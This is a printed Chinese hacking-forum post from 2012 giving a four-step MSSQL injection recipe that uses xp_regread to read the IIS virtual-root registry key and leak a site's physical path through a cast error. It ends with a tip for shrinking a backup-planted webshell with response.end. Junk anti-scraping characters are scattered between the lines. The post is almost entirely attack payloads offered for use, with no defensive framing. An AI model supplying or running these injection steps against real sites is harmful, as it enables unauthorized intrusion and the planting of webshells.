中国网络渗透测试联盟
标题:
DB权限暴出网站物理路径代码
[打印本页]
作者:
admin
时间:
2012-9-15 14:23
标题:
DB权限暴出网站物理路径代码
1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表
' e& ^2 ^' l% y9 m4 ]
: X6 W& J: ]9 b8 @
2 d0 g4 g4 j4 h% y3 E3 x$ Y
2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中
- u/ K, T7 U. C2 A$ Z. i3 y5 T( J! J
( J/ O8 F* C3 E5 Q2 N
9 B$ w' X" b/ n6 A8 g' X
3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段
) {: a& X2 k& K( k: O# E$ k
6 y, o0 A. M( P' c5 \: r8 R
5 v" d! K7 N$ j( i. e* R
4、drop table [jm_tmp]-- 删除此表。
9 X8 N( T0 T" V: o* U4 d
- w- h" W4 n& f, f
/ b: j5 w6 g: L% P( ?6 L, ?
另附上备分专用一句话
& S6 G% ~" s! o' j# v/ E4 O
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
. L5 H( B* |" U' F3 N2 {8 M: s
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2